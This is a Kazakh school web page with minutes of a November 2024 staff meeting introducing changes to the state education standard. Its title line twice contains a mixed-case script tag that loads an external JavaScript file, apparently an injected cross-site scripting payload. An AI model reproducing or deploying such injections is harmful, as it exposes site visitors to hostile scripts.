Педагогтармен мемлекеттік білім беру стандартындағы өзгерістер мен толықтыруларды таныстыру<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.11.2024

«Азат ауылының жалпы орта білім беретін мектебі» КММ

Педагогтармен мемлекеттік білім беру стандартындағы өзгерістер мен толықтыруларды таныстыру  туралы отырыстың

Хаттамасы

                                                                                                  25.11.2024ж

                                                                                                   Қатысқандар: 33

                                                                                                   Қатыспағандар:3

Себепті: 3

Себепсіз: 0

Күн тәртібінде:

1. Мемлекеттік білім беру стандартындағы өзгертулер мен толықтырулар туралы.

Тыңдалды.

Директордың оқу-тәрбие ісі жөніндегі орынбасары Аманжол Кумисай педагогтарды мемлекеттік  бастауыш, негізгі және орта білім беру стандартындағы жаңа өзгерістермен таныстырды. Бұл стандарттағы өзгерістер жобасы  2026-2027 оқу жылында қолданысқа енгізілетіні жөнінде айтылды. Жаңа өзгерістермен таныстыру барысында төмендегі сұрақтарға тоқталды:

· стандарттардың қолдану салалары;

· білім мазмұнына қойылатын талаптар;

· бастауыш білім берудің базалық құндылықтары;

· негізгі орта білім берудің базалық құнділіқтары;

· педагогикалық тәсілдеме;

· көптілді білім беру;

· инклюзивті білім беру: негізгі талаптары мен тәсілдері;

· бастауыш білім берудің білім беру салалары;

· пәнаралық біріктіру;

· білім стандарттарының «бағалау» бөліміне кіріспе;

· білім беру салалары бойынша оқытудан күтілетіннәтижелер;

· кәсіптік бағдар беру және әлеуметтік бағалау;

· бастауыш/ негізгі орта білім берудің мемлекеттік жалпыға міндетті стандартын жүзеге асыру мониторингі.

Шешімі:

1. Стандарттағы жаңа өзгерістер мен толықтырулармен  әр педагог мұқият таныссын.

Хатшы:             Аманжол Күлзат

Просмотров: 7776


Пікір қосу



Деректерді қолтаңбаға қосу